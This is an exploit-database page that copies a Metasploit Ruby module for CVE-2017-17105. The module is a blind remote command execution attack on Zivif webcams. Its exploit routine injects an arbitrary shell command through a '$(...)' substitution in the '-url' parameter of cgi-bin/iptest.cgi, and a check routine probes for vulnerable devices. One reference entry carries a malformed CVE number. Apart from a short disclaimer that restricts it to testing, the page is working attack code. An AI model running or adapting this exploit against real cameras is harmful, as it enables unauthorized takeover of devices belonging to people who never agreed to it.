Advertisement






Zivif Camera 2.3.4.2103 iptest.cgi Blind Remote Command Execution

CVE Category Price Severity
CVE-2017-17105 CWE-78 $500 High
Author Risk Exploitation Type Date
Sick Codes High Remote 2020-06-17
CPE
cpe:cpe:/a:zivif:camera:2.3.4:2103
CVSS EPSS EPSSP
CVSS:7.5/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020060066

Below is a copy:

Zivif Camera 2.3.4.2103 iptest.cgi Blind Remote Command Execution
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'             => 'Zivif Camera iptest.cgi Blind Remote Command Execution',
      'Description'      => %q{
          This module exploits a remote command execution vulnerability in Zivif
       webcams.  This is known to impact versions prior to and including v2.3.4.2103.
       Exploit was reported in CVE-2017-17105.
      },
      'License'          => MSF_LICENSE,
      'Author'           => [ 'Silas Cutler (p1nk)' ],
      'References'       =>
        [
          [ 'URL', 'https://seclists.org/fulldisclosure/2017/Dec/42' ],
          [ 'CVE', '2017-171069' ]
        ],
      'Platform'         => 'unix',
      'Targets'          =>
        [
          [ 'Automatic Target', { }]
        ],
      'Payload'        =>
        {
          'Space'       => 1024,
          'BadChars'    => "\x00\x27",
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic'
            }
        },
      'DefaultOptions'  =>
        {
          'PAYLOAD'           => 'cmd/unix/generic',
        },
      'Privileged'       => false,
      'DisclosureDate'   => "2017-09-01",
      'DefaultTarget'    => 0))
  end

  def check
    res = send_request_cgi('uri' => normalize_uri('cgi-bin', 'iptest.cgi'))
    unless res
      vprint_error('Connection failed')
      return Exploit::CheckCode::Unknown
    end
    unless res.code && res.code == 200
      return CheckCode::Safe
    end

    CheckCode::Detected
  end

  def exploit
    print_status("Sending request")
    cmd = datastore['CMD']

    res = send_request_cgi(
      'uri' => normalize_uri('cgi-bin', 'iptest.cgi'),
      'method' => 'GET',
      'vars_get' => {
        'cmd' => "iptest.cgi",
        '-time' => Time.now.to_i,
        '-url' => "$(" + cmd + ")"
      }
    )

    unless res
      fail_with(Failure::Unreachable, 'Connection failed')
    end

    if res.code && res.code == 200
      print_good('Command sent successfully')
    else
      fail_with(Failure::UnexpectedReply, 'Unable to send command to target')
    end
  end

end

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum